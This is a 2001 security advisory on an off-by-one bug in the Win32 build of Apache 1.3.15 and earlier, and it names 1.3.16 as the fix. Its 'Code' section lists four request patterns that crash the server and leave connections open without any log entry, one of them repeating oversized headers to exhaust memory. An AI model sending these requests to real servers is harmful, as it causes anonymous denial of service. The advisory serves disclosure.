######################################################################

                            Luigi Auriemma

Application: Apache webserver
             http://httpd.apache.org
Version:     <= 1.3.15 only on Win32
Bug:         Bad management of URI of 8192 bytes (off-by-one bug)
Date:        12 Apr 2001
Author:      Luigi Auriemma
             e-mail: aluigi@autistici.org
             web:    aluigi.org

######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


######################################################################

===============
1) Introduction
===============


The bug I show exists only on the Win32 porting of Apache webserver.


######################################################################

======
2) Bug
======


When the Apache server receives 8192 bytes in a request it crashs
internally, sends a MessageBox to the administrator and leaves the
connection open forever.
The biggest problem is the memory occupation of this attack. In fact
we can send after the GET request of 8192 bytes also other 100 strings
of the same size (for example "Accept: 'A'x8182").
In WinNT/2k the attack is more dangerous because the administrator
receives a MessageBox for eachone of this "long strings".
The last problem is the most dangerous: no entries in the logs.
The attacker will be anonymous during the attack so the administrator
can view only the messages and a big list of idle connections.
This is not a buffer overflow so cannot be executed remote code.


######################################################################

===========
3) The Code
===========


Some examples:

1) GET (8184 of "/") /

2) HEAD /(8182 of "A") /

3) GET (8184 of "/") /
      for 100 times:
   Accept: (8182 of "/")

4) GET (8177 of "/") HTTP/1.0


######################################################################

======
4) Fix
======


Apache 1.3.16


######################################################################